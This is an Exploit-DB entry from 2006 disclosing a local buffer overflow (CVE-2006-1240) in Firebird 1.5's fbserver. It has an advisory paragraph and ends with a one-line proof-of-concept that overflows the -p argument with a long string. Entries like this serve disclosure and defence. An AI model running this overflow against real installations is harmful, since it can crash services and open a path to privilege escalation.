Firebird 1.5 - Local Inet_Server Buffer Overflow Vulnerability

2006-03-13T00:00:00
ID EDB-ID:27418
Type exploitdb
Reporter Joxean Koret
Modified 2006-03-13T00:00:00

Description

Firebird 1.5 Local Inet_Server Buffer Overflow Vulnerability. CVE-2006-1240. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/17077/info

Firebird is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly check boundaries of user-supplied command-line argument data before copying it to an insufficiently sized memory buffer.

Attackers may exploit this issue to execute arbitrary machine code with elevated privileges, because the affected binaries are often installed with setuid privileges.

./fbserver -p `perl -e 'print "a"x155;'`1234